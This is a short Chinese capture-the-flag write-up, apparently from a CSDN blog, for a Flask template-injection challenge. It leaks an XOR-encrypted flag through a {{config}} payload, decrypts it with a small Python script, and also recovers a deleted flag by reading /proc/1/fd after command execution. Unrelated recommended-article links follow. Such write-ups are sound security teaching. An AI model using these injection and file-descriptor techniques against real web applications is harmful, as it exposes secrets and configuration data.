[pasecactf_2019]flask_ssti proc ssti config

其实这个很简单

Linux的/proc/self/学习-CSDN博客

首先ssti 直接fenjing一把锁了

这里被加密后 存储在 config中了 然后我们去config中查看即可

复制代码
{{config}}

可以获取到flag的值

复制代码
-M7\x10w@d94\x02!`-\x0eL\x0c;\x07(DKO\r\x17!2R4\x02\rO\x0bsT#-\x1c`@Z\x1dG

然后就可以写代码解密

复制代码
def encode(line, key, key2):
    return ''.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line)))

flag = "-M7\x10w@d94\x02!`-\x0eL\x0c;\x07(DKO\r\x17!2R4\x02\rO\x0bsT#-\x1c`@Z\x1dG"

flag = encode(flag, 'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3', 'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT')

print(flag)

因为都是异或 异或的异或就是 原本 所以不需要修改

就可以输出flag

proc

还有另一个方法 存储在 proc中

首先我们可以执行命令了

查看一下进程 ps

发现app的进程在pid为1

我们去查看

复制代码
ls /proc/1/fd

这里其实没有这么多 因为我靶场没有关 原本只有 1-5 所以我们开始访问 可以在3 获取到flag

这里的原理

复制代码
fd是一个目录,里面包含着当前进程打开的每一个文件的描述符,然后虽然他把flag删掉了,但进程并没有关闭它,所以目录下 还是会有这个文件的文件描述符,通过这个文件描述符我们即可以得到被删除的文件的内容
相关推荐
程序员三藏几秒前
银行测试:第三方支付平台业务流,功能/性能/安全测试方法
自动化测试·软件测试·python·功能测试·测试工具·职场和发展·安全性测试
福大大架构师每日一题8 分钟前
2025-10-16:有向无环图中合法拓扑排序的最大利润。用go语言,给定一个由 n 个节点(编号 0 到 n-1)构成的有向无环图,边集合用二维数组 edge
后端
程序员晚枫10 分钟前
Python版本进化史:从3.6到3.14,每个版本都带来了什么惊喜?
python
只玩代码12 分钟前
技术拆解:基于 Rokid CXR-M SDK 构建“AI 实时翻译眼镜伴侣”核心逻辑
后端
码码宇15 分钟前
技术拆解:Rokid CXR-M SDK 如何构建流畅AR演讲提词功能
后端
沐眼16 分钟前
技术拆解:Rokid CXR-M SDK 构建 AI 智能提词眼镜助手连接到场景落地
后端
阑梦清川16 分钟前
docker基础学习通关教程
后端
五月天17 分钟前
边走边听,所见即所讲:用手机+AR眼镜构建新一代智能导览体验
后端
BingoGo17 分钟前
现代 PHP8+ 实战特性介绍 Enums、Fibers 和 Attributes
后端·php
三十_18 分钟前
TypeORM 基础篇:项目初始化与增删改查全流程
前端·后端